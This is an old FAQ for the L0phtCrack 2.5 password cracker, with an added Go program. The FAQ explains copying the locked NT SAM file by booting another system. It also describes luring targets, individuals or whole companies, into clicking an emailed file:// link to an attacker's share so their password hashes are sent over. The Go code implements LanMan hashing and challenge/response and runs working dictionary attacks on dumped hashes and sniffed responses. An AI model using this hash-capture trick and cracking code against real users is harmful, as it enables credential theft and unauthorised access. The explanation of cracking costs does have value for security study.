L0phtCrack 2.5 FAQ

Last updated 1/02/99

1. Can I use a custom character set for brute forcing?

Yes. Enter the character set you want in the Character Set field of the Tools > Options dialog box. The character set is saved with the file you are cracking, so it is kept if you stop and later resume a cracking session.

2. How do I get the SAM file? It seems locked.

The SAM file in \winnt\system32\config is held open by the OS so that it cannot be read while NT is running. To read it you need to boot an alternate operating system such as Linux or DOS. The file is usually on an NTFS partition. Linux can read NTFS natively, but DOS needs a special program to access the partition: go to www.sysinternals.com and download NTFSDOS. It lets you boot from a DOS floppy, run NTFSDOS, and copy files off the NTFS partition. Copy the SAM file and bring it to the machine running L0phtCrack to import it.

3. Cracking sniffer dumps seems to take a long time. Is this right?

Yes. Cracking the challenge/response pairs captured from the network takes longer per password than cracking the same password from a registry dump. In a registry dump every hash is computed the same way, so one trial hash can be compared against all of the dumped hashes at once. In a network capture each response is computed from the password hash and a challenge that is unique to that session, so the work done cracking one password cannot be reused on another. The time to completion therefore scales linearly with the number of captured challenge/response pairs: 10 captured pairs take 10 times as long as one. That can take a long time, so this type of cracking really needs to be targeted at particular passwords to be effective. We estimate that cracking a single network challenge/response takes about 10 times longer than cracking a normal password hash.

4. I get "cannot open network device or do not have sufficient privileges to install packet driver." What's wrong?

You need administrator privileges to do network sniffing, or at least an administrator has to run L0phtCrack and choose SMB Network Capture once so that the packet driver gets installed.

5. I am on a switched network and can't capture anyone else's password hashes. Am I out of luck?

No. You just have to make the hashes come to you. Send an email to your target, whether an individual or a whole company, that includes a URL of the form file:////yourcomputer/sharename/message.html. When people click that URL, their machine connects to your share and sends their password hashes to you for authentication.
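The following is an added example, not code from L0phtCrack or its authors, illustrating the cost difference behind the sniffer-dump question above and what a cracker has to do with the challenge/response pairs that the file:// URL trick delivers. It implements the standard LanMan (LM) hash and the 24-byte LM challenge/response as used by SMB, then runs a dictionary attack two ways: against registry-dumped hashes, where one trial hash is compared with every target, and against captured (challenge, response) pairs, where each capture needs its own pass over the dictionary. The dictionary, the target passwords and the challenges are constructed for the demonstration; the NT (MD4) hash that L0phtCrack also handles is omitted, and the function names are the example's own.

```go
package main

import (
	"bytes"
	"crypto/des"
	"fmt"
	"strings"
)

// desKey56 expands a 7-byte key fragment into the 8-byte DES key layout:
// 7 key bits per byte, with the low bit left for the unused parity bit.
func desKey56(k7 []byte) []byte {
	k := []byte{
		k7[0] >> 1,
		(k7[0]&0x01)<<6 | k7[1]>>2,
		(k7[1]&0x03)<<5 | k7[2]>>3,
		(k7[2]&0x07)<<4 | k7[3]>>4,
		(k7[3]&0x0F)<<3 | k7[4]>>5,
		(k7[4]&0x1F)<<2 | k7[5]>>6,
		(k7[5]&0x3F)<<1 | k7[6]>>7,
		k7[6] & 0x7F,
	}
	for i := range k {
		k[i] <<= 1
	}
	return k
}

// desEncrypt encrypts one 8-byte block under a 7-byte key fragment.
func desEncrypt(k7, block []byte) []byte {
	c, err := des.NewCipher(desKey56(k7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// LMHash is the LanMan hash stored in the SAM: the password is upper-cased,
// cut or zero-padded to 14 bytes, and each 7-byte half DES-encrypts the
// constant "KGS!@#$%". There is no salt, so equal passwords give equal hashes.
func LMHash(password string) []byte {
	p := make([]byte, 14)
	copy(p, strings.ToUpper(password))
	return append(desEncrypt(p[:7], []byte("KGS!@#$%")), desEncrypt(p[7:], []byte("KGS!@#$%"))...)
}

// LMResponse is what the client sends over SMB: the 16-byte hash is zero-padded
// to 21 bytes and each 7-byte third DES-encrypts the server's 8-byte challenge.
func LMResponse(hash, challenge []byte) []byte {
	k := make([]byte, 21)
	copy(k, hash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desEncrypt(k[i:i+7], challenge)...)
	}
	return resp
}

// CrackHashes attacks registry-dumped hashes. One hash computation per
// candidate is compared against every target, so the work (returned as the
// number of candidate hashes computed) does not grow with the number of targets.
func CrackHashes(dict []string, targets [][]byte) (found map[string]string, work int) {
	found = map[string]string{}
	for _, cand := range dict {
		h := LMHash(cand)
		work++
		for _, t := range targets {
			if bytes.Equal(h, t) {
				found[fmt.Sprintf("%X", t)] = cand
			}
		}
	}
	return found, work
}

// Capture is one sniffed SMB authentication: the server's challenge and the
// client's 24-byte response.
type Capture struct{ Challenge, Response []byte }

// CrackCaptures attacks sniffed challenge/response pairs. The response depends
// on the per-session challenge, so nothing computed for one capture can be
// reused for the next: work grows linearly with the number of captures.
func CrackCaptures(dict []string, caps []Capture) (found []string, work int) {
	for _, c := range caps {
		hit := ""
		for _, cand := range dict {
			work++
			if bytes.Equal(LMResponse(LMHash(cand), c.Challenge), c.Response) {
				hit = cand
				break
			}
		}
		found = append(found, hit)
	}
	return found, work
}

func main() {
	// Constructed dictionary and target passwords for the demonstration.
	dict := []string{"letmein", "secret", "password", "qwerty"}
	users := []string{"password", "qwerty", "secret"}
	var hashes [][]byte
	var caps []Capture
	for i, pw := range users {
		h := LMHash(pw)
		hashes = append(hashes, h)
		chal := []byte{byte(i), 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF} // constructed per-session challenge
		caps = append(caps, Capture{chal, LMResponse(h, chal)})
	}
	f1, w1 := CrackHashes(dict, hashes)
	f2, w2 := CrackCaptures(dict, caps)
	fmt.Printf("registry dump: %v in %d candidate hashes\n", f1, w1)
	fmt.Printf("network capture: %v in %d candidate responses\n", f2, w2)
}
```

Running it shows the three registry hashes falling in a single pass of four candidate hashes, while the three captures cost nine response computations even with early exit on each hit, and a fourth capture would add another full pass. The LM hash of "password" (E52CAC67419A9A224A3B108F3FA6CB6D) and of the empty password (AAD3B435B51404EEAAD3B435B51404EE) can be used to check the hash routine against published values.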